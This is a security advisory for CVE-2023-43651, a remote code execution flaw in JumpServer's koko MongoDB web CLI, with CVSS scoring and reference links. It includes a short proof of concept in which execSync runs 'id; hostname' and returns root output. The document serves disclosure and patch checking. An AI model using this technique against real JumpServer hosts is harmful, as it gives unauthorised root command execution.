CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
EPSS
Percentile
54.5%
An authenticated user can exploit a vulnerability in MongoDB sessions to execute arbitrary commands, leading to remote code execution. This vulnerability may further be leveraged to gain root privileges on the host system.
Through the WEB CLI interface provided by koko, a user logs into the authorized mongoDB database and exploits the MongoDB session to execute arbitrary commands.
admin> const { execSync } = require("child_process")
admin> console.log(execSync("id; hostname;").toString())
uid=0(root) gid=0(root) groups=0(root)
jms_koko
admin>
Safe versions:
It is recommended to upgrade the safe versions.
After upgrade, you can use the same method to check whether the vulnerability is fixed.
admin> console.log(execSync("id; hostname;").toString())
/bin/sh: line 1: /bin/hostname: Permission denied
Thanks for Oskar Zeino-Mahmalat of Sonar found and report this vulnerability
Vendor | Product | Version | CPE |
---|---|---|---|
jumpserver | koko | * | cpe:2.3:a:jumpserver:koko:*:*:*:*:*:*:*:* |
github.com/advisories/GHSA-4r5x-x283-wm96
github.com/jumpserver/jumpserver/security/advisories/GHSA-4r5x-x283-wm96
github.com/jumpserver/koko/commit/7d80db95d17c8f42bdf50260dfc21dc2bd0452c2
github.com/jumpserver/koko/commit/857f8b9e41f0930dc6190a35d8601fffa5e884e7
nvd.nist.gov/vuln/detail/CVE-2023-43651